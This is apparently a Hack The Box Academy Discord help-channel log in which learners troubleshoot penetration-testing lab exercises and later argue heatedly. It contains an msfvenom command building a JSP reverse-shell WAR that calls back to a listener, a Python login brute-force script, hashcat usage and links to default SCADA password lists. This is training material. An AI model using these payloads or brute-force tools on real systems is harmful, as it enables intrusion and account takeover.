Need to speak to a person? Learn how to reach our support via HTB Labs.
do you mean me marcielee
I mean @odd eagle since they're having issues accessing the site altogether
oh ok
No idea what your issue is.
Mobile you'd have to connect to the vpn to access the sites
And even then doing any interaction on mobile is nails on a chalkboard
k ill try again im using the openvpn they give you
But again, I'd just wait until you're at a computer to do it
im in the pc
Not you
Only thing i can say is message/email support and try and resolve the issue
Module: Footprinting - Lab Hard:
Task:
Enumerate the server carefully and find the username "HTB" and its password. Then, submit HTB's password as the answer.
That is indeed the task
Reading the engagement carefully will help you understand where to look
So i am on flag4.txt question on the Linux Privilege Escalation Skill Assessment and Idk if I am trying to do the wrong thing here but I have the admin credentials for the Tomcat Manager and I have tried using msfconsole with that information along with setting my own payload with msfvenom to get a reverse shell into it to find the flag4.txt. i have tried multi/http/tomcat_mgr_upload and entered in all of the options and it keeps saying : Exploit aborted due to failure: unknown: Failed to execute Payload. And when I upload the war file I cannot get a connection back from the upload on my listener. Some help would be appreciated if possible.
you are prolly using the wrong msfvenom payload
^
@topaz zenith What I understand is that I have to find the credentials to access the POP3S service, am I correct?
You @ the wrong person
But enumerate ports udp and tcp
msfvenom -p java/jsp_shell_reverse_tcp LHOST= 10.10.15.43 LPORT=4321 -f war -o rshell.war
Looks like you have a space after LHOST=
XD
@fathom pendant I've got the ports in sight
22
995
993
110
143
There's more
That's only tcp
look at the help menu for nmap to see what flag to scan for udp if u dont know
wow thank you
If someone can 😭 : #1227666293902282782 message
Looks like [-] means bad and [+] means good
"I will then perform a more thorough scan to see what I can find and thus be able to find something." @fathom pendant
Also think about what services you may not have interacted with yet
I spent way too long on this on my first go though because I just didn't read
A handful of keywords actually clear a bunch up as to what to look for
???
It's not answering to my problem 😭.
Meaning the output of the program
I know.
That's a whole other issue
But grep you can just do from the cli
command | grep "string"
Escape [ and ]
Gotta learn how to escape chars brother
\I have already used it and still "blue" lol, dw I know.
Also looks like the error is within the python program
It runs fine without the grep yeah?
import sys
import requests
import os.path
url = "xxx"
headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36"}
messageOnValidation = "Welcome"
def unpack(fline):
    column = fline.split(",")[2]
    Username = column.split(":")[-1].strip()
    Password = column.split(":")[0].strip()
    return Username, Password
def do_req(url, Username, Password, headers):
    data = {"Username": Username, "Password": Password, "submit": "submit"}
    res = requests.post(url, headers=headers, data=data)
    return res.text
def check(haystack, needle):
    if needle in haystack:
        return True
    else:
        return False
def main():
    if (len(sys.argv) > 1) and (os.path.isfile(sys.argv[1])):
        fileName = sys.argv[1]
    else:
        print("[!] Please check wordlist.")
        print("[-] Usage: python3 {} /path/to/wordlist".format(sys.argv[0]))
        sys.exit()
    with open(fileName) as fh:
        for fline in fh:
            if fline.startswith("#"):
                continue
            Username, Password = unpack(fline.rstrip())
            print("[-] Checking account {} {}".format(Username, Password))
            res = do_req(url, Username, Password, headers)
            if (check(res, messageOnValidation)):
                print("[+] Valid account found: Username:{} Password:{}".format(Username, Password))
if __name__ == "__main__":
    main()
Brother I'm not reading that
Hmm
??
Not mine, just edited unpack to have something working with scada.
Come from the course lol.
You want to grep only valid account ? But the regex with grep doesn't work ?
Adding the grep seems to break the python script
There is a file at the end only if there is one account.
what do you want to do exactly please ?
What is the valid username.
Is the welcome message "Welcome!"
They give us this script : https://academy.hackthebox.com/storage/modules/80/scripts/basic_bruteforce_py.txt
Also how are you grabbing the message
It's for valid, not invalid.
Valid we have no info.
Invalid is : "Invalid credentials."
I can maybe edit to have not invalid.
did you try to grep only "Valid account found" ?
Also your script looks different from the provided one
Or it is grepping in itself that broke your chain ?
It's normal.
And is missing the contextual remarks
yeah he said he modified it but not so much
Looks at the scada.csv.
To let us know what it's doing
"Our php examples use userid and passwd
It works only for a csv with this for example :
Yeah and I edited.
what you can do is in all the print command except the valid one you add file=sys.stderr
so you can pip 2>/dev/null all the wrong answer and keep only the valid one
??
print("[-] Checking account {} {}".format(Username, Password), file=sys.stderr)
This is sending "username" and "Password"
data = {"Username": Username, "Password": Password, "submit": "submit"}
Not userid and passwd
Where do you see "username"?
????
Literally this??
userid is an ex for their php page, not this one.
In this case, it's Username and Password.
Then further clarify that it's not for the example you're doing dude
Just throwing the raw code at us doesn't help
I quoted the question and gave the link but nvm...
I don't have that module unlocked
Well tell me xd, dw :).
And just linking the page doesn't help us understand your problem
.
"Inspect the login page and perform a bruteforce attack. What is the valid username?"
Look at the page title, and find the relevant list.
The title is speaking about scada.
BUT, the csv stored in the seclists repo is not like the which one I show you before as example :
^
So, the script given is wrong because it's taking 1st & 2nd column, but in scada.csv, it's the third and in the same column.
Did you check if there's a resources button?
So it's give us this function because only this one should be edited, but we have to replace parameters name and url:
def unpack(fline):
    column = fline.split(",")[2]
    userid = column.split(":")[-1].strip()
    passwd = column.split(":")[0].strip()
    return userid, passwd
the module seems hella fun to try LOL
And nothing :
I just edited a last thing : the message because I don't know the valid message when we are connected :
Are you exactly sure that it wants scada login
well the seclist csv is wrong
but also https://github.com/scadastrangelove/SCADAPASS/blob/master/scadapass.csv found a few HMI/SCADA related passwords here
http://scadasecuritybootcamp.com/SCADA-Default-Password-List.php here's just a list and you can ctrl+f for it
Default passwords for many of the SCADA / ICS / IIoT devices in use. Many of these devices are on the Internet, accessible to the world.
... They are giving us a script bro 🤣.
mmh?
Yeah a list, and what are talking about? CSV wow 🤣.
a
b
c
d
e
etc.
Is a list.
I am stuck on the same one I have the UsnJrnl file .csv
Does someone have a hint do I look at the cvs file or somewhere else?
you can use the entry numbers to correlate file creation
yeah i just threw something i googled at you
i didn't check it; but you can google "WebAccess default password"
the journal won't tell you exactly how the file was created though
Found :), thx but for me it's ... idiot.
Google is your friend buddy
Hmmm why does it say to investigate USN Journal, I don't get it 
because you need to
Stupid section imo...
there is a pattern that you can find in the journal that will help
Event logs are your friend
nah; just be better at researching
for shits and giggles i did it on my host in chrome 
Hum, why we should be supposed to search when we have a python script, explain?
Because the python script isn't magic lol
You still need to provide the script a list
csv column is a list...
not everything is straightforward
Yes, but the list you used might not have what you're looking for
you will have to do some critical thinking
Hence: research
Yeah that's write.
But, they shoud update it then... from 2021 = 0 updates 😭.
SecLists?
No.
I'm stuck on /module/176/section/1778
It looks like to get the first answer here, I'll need to take the hash I got written to my spn.txt outfile and crack it using some "passwords.txt" and I cannot find the "passwords.txt" file that I'm supposed to use to crack this password... Where am I supposed to get the passwords.txt file from? or have I misunderstood something?
Check the resources button
Rockyou doesn't have everything
The module may have instructed you to make one at some point
It didn't.
Maybe... like idk? look at what I'm asking before trying to provide assistance? You're 0 for 2, not exactly being helpful here.
perhaps reading on may clear it up if it's further in the reading ¯_(ツ)_/¯
The one I linked you?
submit a pr to have the maintainer update the list ¯_(ツ)_/¯
Not a helpful comment. I am here because I've done that already.
Your message didn't indicate that, and plenty of people have had issues clarified by continuing to read
Are you just going to continue to not be helpful here? It's a waste of my time.
No, the lesson.
Is there a passwords.txt on the host you're meant to connect to?
The lesson is fine
I managed it just fine by doing a tiny bit of research, not everything will be handed to you in the modules
Try using a password file like rockyou
I had to read up to that point but yeah no link to a password.txt, meaning the example is just an example of the format of the command
itd be rad if you did that before you responded at all.
hashcat -m <mode> -a <attackmode> <hashfile> <password file>
I also researched the question on the forums
Every time I come in here you're answering questions prematurely as you did here, and every time I am annoyed by you by my experience on this discord server.
and most people have been using rockyou ¯_(ツ)_/¯
i feel like the Password Attacks module would have led you to use rockyou initially
dang i thought i was the annoying one
Itd be cool if coming here was helpful more often than it was annoying.
Glad to ruin your experience ig
Marcie is here doing the modules just like you, the attitude is quite off putting. They don't know everything like you obviously don't.
I ask basic questions when your initial info is lacking for better troubleshooting
That's fine. I'm not in here telling people how to solve things I know not how to solve.
because that helps no one.
Also I'm not 0 for 2 buddy
lol yes you were, when I said that.
I did eventually help the dude out with his broken auth question
And have now helped you
You were 0 for 2 with my request.
they're talking about your suggestions. you were 0-2
Ah
So that even if I didn't do the module, I can provide an accurate guess to help
yeah, you were 0 for 2, so no.
All I did was asking for more info since you were lacking in your initial request
No, you told me to download it from the resources
Getting mad at people trying to help is a good way to get less people interested in helping
Which didn't exist. First miss.
Don't feed the troll 😦
I didn't know it didn't exist, and many people miss the resources button
Right, so don't provide help unless you know what you're doing? Seems basic af
And as stated, many people also try and go line by line and miss something later in the reading
I haven't said anything the last two times you've acted the exact same way
no one knows everything bruh
But it's clearly a pattern with @fathom pendant
2 very good reasons for me to ask for more info
That's fine to not know stuff. Don't say you know stuff when you don't. That simple
99% of the time, I can make an educated guess based off available info
marcie has helped a lot of people
ever thought about not being a prick?
lol false. you're 0 for 3 with my visiting this discord.
this is a gem going back to older messages
If you had stated, "there's no resources button and the module hasn't had us create a list" that provides broader context to just "there's no passwords.txt"
And I would have, off the bat, suggested rockyou
If you followed the URL I provided, you would have known. I provided requisite info. stfu jfc
look marcie, you can't help em all, and clearly they don't want to be helped
He just wants to bitch and complain
I want you, personally, to stop prematurely trying to provide help.
I just googled "windows attack&defense no password.txt" and looked through the forums as well as read the module ¯_(ツ)_/¯
Because it is obnoxious, every time I come here it happens. It is you. Every time.
Then mute me
Done.
lmao who tf you think you are 
Idk why he didn't just block me from the start instead of the rant
Considering I did ultimately help
But w/e
People just want handouts, and you can't please everyone.
A person paying for educational resources. Trying to get the education I'm paying for. Annoyed at the help community provided by the platform being so god awful.
And I mean, it is just @fathom pendant every time I'm here.
Consistent AF, quickly responding to people's inquiries with invalid info.
Just wasting time, not helping.
you still need help?
they got help in the end ¯_(ツ)_/¯
Still frustrated that the lesson isn't providing the password list we're to use for the assignment. That seems short-sighted.
the lesson assumes you understand password attacks
It gets more delusional each reply
I also don't take anything personally tbh. I come from a CS background... used to people being like this
The lesson doesn't mention that.
I have finished all requisite modules before this one.
So it wasn't presented in a logical order that facilitates a learning process.
More of that awesome community. Thanks.
I'm glad you don't, I can't stand the toxic behavior when asking the community for help.
"help community provided by the platform" bro, you aren't paying for the help here, if you think it's bad, then don't ask for help, it's simple as that
AD Enumeration and Attacks is a prerequisite.
If you can pass this ss along since I'm blocked?
the prerequisite to that module is Password Attacks

He blocked me ig so he probably isn't seeing the screenshot I shared
the information you get from Password Attacks would lead you to using rockyou to crack the hash
i blocked him so... ¯_(ツ)_/¯
My help is bad because people format questions poorly, and wonder why there's followup questions
nah, I think your help is adequate for those who can help themselves. if you gave wrong info I would've said something when I see it
People constantly ask poor questions, hell I'm sure I'm guilty of it every now and then, but still no excuse for attitude.
¯_(ツ)_/¯
Some question here be like hello am stuck in module blah can you help me
Give bare minimum; get bare minimum
I often am ignoring those
I ignore way more of those than I'd like to admit
taking the frustrations to unrelated matters onto other people is just plain stupid
¯_(ツ)_/¯
I do tend to answer things without the full picture, but often the full picture isn't given as well
It's consistent. Every time I come here. Marcie is unhelpful. Xre0us has been helpful in the past. caculac0re is being helpful. I have considered calling out Marcie's unhelpful nature every time I've come here.
This is the third time. 3 for 3. So yes, going to mention it.
I have silver annual so I can afford to just click start on whatever t0-2 module if I feel curious enough
But often it's a case of missing fundamentals, or it's in the next paragraph
Maybe there should be a template like the erroneous chan. How to ask better questions by force.
My exact question was fine:
I'm stuck on /module/176/section/1778
It looks like to get the first answer here, I'll need to take the hash I got written to my spn.txt outfile and crack it using some "passwords.txt" and I cannot find the "passwords.txt" file that I'm supposed to use to crack this password... Where am I supposed to get the passwords.txt file from? or have I misunderstood something?
I was then provided two answers that were of 0 value from Marcie.
"What does insert.foot[ass] do?"
"insert.foot[ass] and it's uses"
And sometimes it's a case of just fucking around with the command. Like some ad acl stuff shows that the user you query has rights over the returned object
I didn't piece it together until I messed with filtering a bit
¯_(ツ)_/¯
There are 3 modules I need to finish that I didn't complete while I still had silver annual. 😦
F
I have the cubes, just need to unlock them.
Yeah I've been holding off my streak by just doing quick t0 stuff
I never clicked through the Setting Up module 
i don't like that streak system because it incentivizes you to not complete the modules
Oh I lied there's 5 😢
steel yourself then
i did like 20 modules in a month and it won't count for anything even though i did amazing
LOCK IN
Does anybody know if the ADCS Attacks module is going to be updated with the new features that are being teased for Bloodhound-CE?
It might
Though idk if they're gonna make changes solely based on bloodhound changes
That would likely be updating the BH module itself
esc13? that came out a couple months ago, who knows
it's also missing esc12

